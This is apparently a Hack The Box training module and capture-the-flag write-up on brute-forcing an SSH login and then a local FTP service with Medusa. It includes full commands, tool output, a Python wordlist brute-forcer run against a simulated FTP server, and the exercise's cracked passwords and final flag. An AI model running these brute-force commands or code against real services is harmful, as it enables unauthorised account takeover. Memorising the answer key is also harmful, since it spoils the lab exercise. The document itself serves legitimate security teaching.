Web Services with Medusa

Strong authentication is the first line of defence for any network service. Secure Shell (SSH) and File Transfer Protocol (FTP) provide remote access and file transfer, but both commonly rely on username and password logins, which makes them natural targets for brute-force attacks. In this module we use Medusa, a parallel network login brute-forcer, to compromise first an SSH service and then an FTP service reachable from it, illustrating the attack path and why hardened authentication practices matter.

SSH is a cryptographic network protocol that provides a secure channel for remote login, command execution, and file transfers over an unsecured network. Its strength lies in its encryption, which makes it significantly more secure than unencrypted protocols like Telnet. However, weak or easily guessable passwords can undermine SSH's security, exposing it to brute-force attacks.

FTP is a standard network protocol for transferring files between a client and a server on a computer network. It's also widely used for uploading and downloading files from websites. However, standard FTP transmits data, including login credentials, in cleartext, rendering it susceptible to interception and brute-forcing.

Kick-off

We begin by targeting an SSH server on a remote system. Assuming we already know the username sshuser, we can use Medusa to try passwords from a wordlist systematically until one of them authenticates.

The following command serves as our starting point:

m4cc18@htb[/htb]$ medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Let's break down each component:

-h <IP>: the target host.
-n <PORT>: the TCP port, needed here because the SSH service is not listening on the default port 22.
-u sshuser: the single username to test.
-P 2023-200_most_used_passwords.txt: a file of candidate passwords, one per line.
-M ssh: the Medusa module to run against the target.
-t 3: the number of login attempts to run in parallel.

Running the command produces output like the following:

m4cc18@htb[/htb]$ medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
...
ACCOUNT FOUND: [ssh] Host: IP User: sshuser Password: 1q2w3e4r5t [SUCCESS]

Upon execution, Medusa will display its progress as it cycles through the password combinations. The output will indicate a successful login, revealing the correct password.

Gaining Access

With the password in hand, establish an SSH connection using the following command and enter the found password when prompted:

m4cc18@htb[/htb]$ ssh sshuser@<IP> -p <PORT>

This command will initiate an interactive SSH session, granting you access to the remote system's command line.

Expanding the Attack Surface

Once inside the system, the next step is to look for other attack surfaces. Running netstat within the SSH session to list listening services reveals something on port 21.

m4cc18@htb[/htb]$ netstat -tulpn | grep LISTEN

tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::21                   :::*                    LISTEN      -

A local nmap scan from within the SSH session confirms that port 21 is an FTP server.

m4cc18@htb[/htb]$ nmap localhost

Starting Nmap 7.80 ( https://nmap.org ) at 2024-09-05 13:19 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000078s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 998 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

Targeting the FTP Server

Having identified the FTP server, you can proceed to brute-force its authentication mechanism.

If we explore the /home directory on the target system, we see an ftpuser folder, which implies the likelihood of the FTP server username being ftpuser. Based on this, we can modify our Medusa command accordingly:

m4cc18@htb[/htb]$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

GENERAL: Parallel Hosts: 1 Parallel Logins: 5
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 197
...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ... Password: ... [SUCCESS]
...
GENERAL: Medusa has finished.

The key differences from the SSH command are: -h 127.0.0.1, because Medusa is now running on the compromised host and attacking its own loopback interface; no -n option, since the FTP server listens on the default port 21; -M ftp, the FTP module; and -t 5, a slightly higher number of parallel attempts. The username ftpuser comes from the /home listing above.

Retrieving The Flag

Upon successfully cracking the FTP password, establish an FTP connection. The URL form below passes the credentials on the command line, which is convenient but leaves the password in your shell history. Within the FTP session, use ls to list the directory and get to download flag.txt, which may contain sensitive information:

m4cc18@htb[/htb]$ ftp ftp://ftpuser:<FTPUSER_PASSWORD>@localhost

Output:

Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||25926|)
150 Here comes the directory listing.
-rw-------    1 1001     1001           35 Sep 05 13:17 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||37251|)
150 Opening BINARY mode data connection for flag.txt (35 bytes).
100% |***************************************************************************|    35      776.81 KiB/s    00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (131.45 KiB/s)
ftp> exit
221 Goodbye.

Then read the file to get the flag:

m4cc18@htb[/htb]$ cat flag.txt
HTB{...}
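The numeric replies in the FTP transcript above (220 banner, 331 after USER, 230 after PASS) are all that a brute-forcer such as Medusa's ftp module needs to inspect: it sends USER, expects 331, sends PASS and treats 230 as a hit and 530 as a miss. The following Python is an added example, not taken from the HTB module or from Medusa. It implements that USER/PASS check and a wordlist loop against a simulated vsftpd whose reply texts, single account (ftpuser with password s3cret!) and wordlist are constructed here so the code runs offline. Against a real host the SimulatedVsftpd object would be replaced by a socket wrapper exposing the same connect() and send() methods.

```python
"""FTP USER/PASS login check and wordlist loop, as a brute-forcer performs it.

Added example, not from the HTB module or from Medusa. The server is an
in-memory stand-in constructed for this example so everything runs offline.
"""
import re
from typing import Dict, Iterable, Optional, Tuple

_REPLY = re.compile(r"^(\d{3})[ -]")


def reply_code(line: str) -> int:
    """Extract the three-digit status code from an FTP reply line."""
    m = _REPLY.match(line)
    if not m:
        raise ValueError(f"malformed FTP reply: {line!r}")
    return int(m.group(1))


class SimulatedVsftpd:
    """Stand-in for a vsftpd control connection (constructed behaviour).

    Like vsftpd, it answers USER with 331 whether or not the account exists,
    so a brute-forcer cannot learn that a username is valid before PASS.
    """

    def __init__(self, accounts: Dict[str, str]) -> None:
        self.accounts = accounts          # constructed credential store
        self.pending_user: Optional[str] = None
        self.connections = 0              # how many times connect() was called

    def connect(self) -> str:
        self.connections += 1
        self.pending_user = None
        return "220 (vsFTPd 3.0.5)"

    def send(self, command: str) -> str:
        verb, _, arg = command.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.pending_user = arg
            return "331 Please specify the password."
        if verb == "PASS":
            ok = self.pending_user is not None and self.accounts.get(self.pending_user) == arg
            self.pending_user = None
            return "230 Login successful." if ok else "530 Login incorrect."
        if verb == "QUIT":
            return "221 Goodbye."
        return "500 Unknown command."


def ftp_login(server, user: str, password: str) -> bool:
    """One authentication attempt on a fresh control connection.

    True only on a 230 reply. A 530 to USER (account refused outright) or to
    PASS (wrong password) is a miss; any other code is a protocol error.
    """
    if reply_code(server.connect()) != 220:
        raise ConnectionError("no 220 service-ready banner")
    code = reply_code(server.send(f"USER {user}"))
    if code == 230:           # server accepted USER alone (RFC 959 allows it)
        server.send("QUIT")
        return True
    if code == 530:
        return False
    if code != 331:
        raise ConnectionError(f"unexpected reply to USER: {code}")
    code = reply_code(server.send(f"PASS {password}"))
    server.send("QUIT")
    if code == 230:
        return True
    if code == 530:
        return False
    raise ConnectionError(f"unexpected reply to PASS: {code}")


def brute_force_ftp(server, user: str, wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Try each password in order; return (password or None, attempts made)."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        if ftp_login(server, user, candidate):
            return candidate, attempts
    return None, attempts


# Constructed wordlist; the module's run used a 197-entry file.
WORDLIST = ["123456", "password", "qwerty", "letmein", "s3cret!", "iloveyou"]

if __name__ == "__main__":
    srv = SimulatedVsftpd({"ftpuser": "s3cret!"})   # constructed account
    print(brute_force_ftp(srv, "ftpuser", WORDLIST))
    print(brute_force_ftp(srv, "nosuchuser", WORDLIST))
```

The checker opens a fresh connection for every attempt because real servers cap failures per control connection (vsftpd's max_login_fails defaults to 3 before it drops the session); a brute-forcer that kept one connection open would stall after a handful of guesses. Note also that the server replies 331 for any username, so it was the /home listing, not the FTP service, that told us the account name to attack.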

The ease with which such attacks can be executed underscores the importance of employing strong, unique passwords.


Exercise

TARGET: 154.57.164.83:31934

Challenge 1

What was the password for the ftpuser?

Discovery

First we attempt to brute-force the SSH password for the given user, sshuser, using the following Medusa command:

┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ medusa -h 154.57.164.83 -n 31934 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3

Output:

...
2026-04-02 11:08:42 ACCOUNT FOUND: [ssh] Host: 154.57.164.83 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
2026-04-02 11:08:43 ACCOUNT CHECK: [ssh] Host: 154.57.164.83 (1 of 1, 0 complete) User: sshuser (1 of 1, 1 complete) Password: 12341234 (47 of 200 complete)
2026-04-02 11:08:43 ACCOUNT CHECK: [ssh] Host: 154.57.164.83 (1 of 1, 0 complete) User: sshuser (1 of 1, 1 complete) Password: Admin@123 (48 of 200 complete)

Note that the only line reporting ACCOUNT FOUND is:

2026-04-02 11:08:42 ACCOUNT FOUND: [ssh] Host: 154.57.164.83 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
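Medusa does not stop printing when it gets a hit: with -t 3 the other parallel threads finish the attempts they had already started, so ACCOUNT CHECK lines trail the ACCOUNT FOUND line, both here and in the module's sample output earlier. Rather than eyeballing the scrollback, a practitioner would extract results mechanically. The following Python is an added example, not part of the HTB module or of Medusa itself; it parses both the timestamped and the bare Medusa line formats that appear on this page, collects every ACCOUNT FOUND credential, and tracks progress. The sample it parses is stitched together from the SSH and FTP lines shown on this page plus Medusa's closing GENERAL line, so that both line formats are exercised.

```python
"""Parse Medusa console output into structured results.

Added example (not from the HTB module or the Medusa project). It recognises
the ACCOUNT FOUND / ACCOUNT CHECK / GENERAL lines Medusa 2.2 prints, with or
without the leading timestamp that some builds add.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Optional "YYYY-MM-DD HH:MM:SS " prefix; both forms appear in this write-up.
_TS = r"^(?:\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} )?"

FOUND_RE = re.compile(
    _TS + r"ACCOUNT FOUND: \[(?P<module>[^\]]+)\] Host: (?P<host>\S+) "
    r"User: (?P<user>\S+) Password: (?P<password>.*?) \[(?P<status>[^\]]+)\]\s*$"
)
CHECK_RE = re.compile(
    _TS + r"ACCOUNT CHECK: \[(?P<module>[^\]]+)\] Host: (?P<host>\S+) "
    r"\(\d+ of \d+, \d+ complete\) User: (?P<user>\S+) \(\d+ of \d+, \d+ complete\) "
    r"Password: (?P<password>.*?) \((?P<done>\d+) of (?P<total>\d+) complete\)\s*$"
)


@dataclass(frozen=True)
class Credential:
    module: str
    host: str
    user: str
    password: str
    status: str  # Medusa prints [SUCCESS] for a valid pair


@dataclass
class MedusaRun:
    found: List[Credential] = field(default_factory=list)
    checks: int = 0
    checks_after_found: int = 0   # in-flight threads finishing after a hit
    last_done: Optional[int] = None
    total: Optional[int] = None
    finished: bool = False


def parse_medusa(lines: Iterable[str]) -> MedusaRun:
    """Walk Medusa's output line by line and return the parsed run."""
    run = MedusaRun()
    seen = set()
    for raw in lines:
        line = raw.rstrip("\r\n")
        m = FOUND_RE.match(line)
        if m:
            cred = Credential(**m.groupdict())
            if cred not in seen:  # keep one entry per unique credential
                seen.add(cred)
                run.found.append(cred)
            continue
        m = CHECK_RE.match(line)
        if m:
            run.checks += 1
            if run.found:
                run.checks_after_found += 1
            run.last_done, run.total = int(m["done"]), int(m["total"])
            continue
        if line.startswith("GENERAL: Medusa has finished."):
            run.finished = True
    return run


def successes(run: MedusaRun) -> List[str]:
    """Valid credentials as module://user:password@host strings."""
    return [f"{c.module}://{c.user}:{c.password}@{c.host}"
            for c in run.found if c.status == "SUCCESS"]


# Constructed sample: lines from the two runs on this page plus the closing line.
SAMPLE_OUTPUT = """\
2026-04-02 11:08:42 ACCOUNT FOUND: [ssh] Host: 154.57.164.83 User: sshuser Password: 1q2w3e4r5t [SUCCESS]
2026-04-02 11:08:43 ACCOUNT CHECK: [ssh] Host: 154.57.164.83 (1 of 1, 0 complete) User: sshuser (1 of 1, 1 complete) Password: 12341234 (47 of 200 complete)
2026-04-02 11:08:43 ACCOUNT CHECK: [ssh] Host: 154.57.164.83 (1 of 1, 0 complete) User: sshuser (1 of 1, 1 complete) Password: Admin@123 (48 of 200 complete)
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
GENERAL: Medusa has finished.
"""

if __name__ == "__main__":
    run = parse_medusa(SAMPLE_OUTPUT.splitlines())
    for s in successes(run):
        print(s)
    print(f"{run.checks} checks, {run.checks_after_found} after first hit, "
          f"progress {run.last_done}/{run.total}, finished={run.finished}")
```

In practice you would pipe Medusa's output through this (or simply grep for "ACCOUNT FOUND") rather than read it; the checks_after_found counter makes the trailing ACCOUNT CHECK lines visible as the artefact of parallelism that they are.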

Therefore we have found the SSH password for the sshuser user and can start an SSH session with those credentials:

┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ ssh sshuser@154.57.164.83 -p 31934

Output:

The authenticity of host '[154.57.164.83]:31934 ([154.57.164.83]:31934)' can't be established.
ED25519 key fingerprint is: SHA256:2DP/wThlQCF/4IvGaF49XZcQO0bREny3YAZ1wSonr2g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[154.57.164.83]:31934' (ED25519) to the list of known hosts.
sshuser@154.57.164.83's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.18.9-talos x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$

Once inside the system, we identify other potential attack surfaces using the following command:

sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ netstat -tulpn | grep LISTEN

Output:

tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::21                   :::*                    LISTEN      -

Let's confirm that port 21 is an FTP service with a local nmap scan:

sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ nmap localhost

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-02 17:25 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00023s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 998 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds

Now that we know we are facing an FTP server, we can check the /home directory for users that may have FTP accounts:

sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ ls -l /home/

Output:

total 0
drwx------. 2 ftpuser ftpuser 73 Apr  2 17:05 ftpuser
drwxr-xr-x. 1 sshuser sshuser 60 Apr  2 17:08 sshuser

Exploitation

Now that we know a likely username for the FTP server (ftpuser), we can run Medusa locally to brute-force that user's password:

sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5

Output:

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

GENERAL: Parallel Hosts: 1 Parallel Logins: 5
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 197
...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: 1234 (17 of 197 complete)
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: aaron431 (18 of 197 complete)
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: iloveyou (19 of 197 complete)
ACCOUNT CHECK: [ftp] Host: 127.0.0.1 (1 of 1, 0 complete) User: ftpuser (1 of 1, 1 complete) Password: password1 (20 of 197 complete)

Note the line:

ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ftpuser Password: qqww1122 [SUCCESS]

flag: qqww1122

Challenge 2

After successfully brute-forcing the ssh session, and then logging into the ftp server on the target, what is the full flag found within flag.txt?

With an FTP username and password in hand, we can start an FTP session to retrieve the flag. Here is the command we need:

sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ ftp ftp://ftpuser:qqww1122@localhost

Output (using ls and get):

Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||25926|)
150 Here comes the directory listing.
-rw-------    1 1001     1001           35 Sep 05 13:17 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||37251|)
150 Opening BINARY mode data connection for flag.txt (35 bytes).
100% |***************************************************************************|    35      776.81 KiB/s    00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (131.45 KiB/s)
ftp> exit
221 Goodbye.

Then read the file to get the flag:

sshuser@ng-130206-loginbfservice-qsydl-774b66fdc-lb9t6:~$ cat flag.txt

Output:

HTB{SSH_and_FTP_Bruteforce_Success}

flag: HTB{SSH_and_FTP_Bruteforce_Success}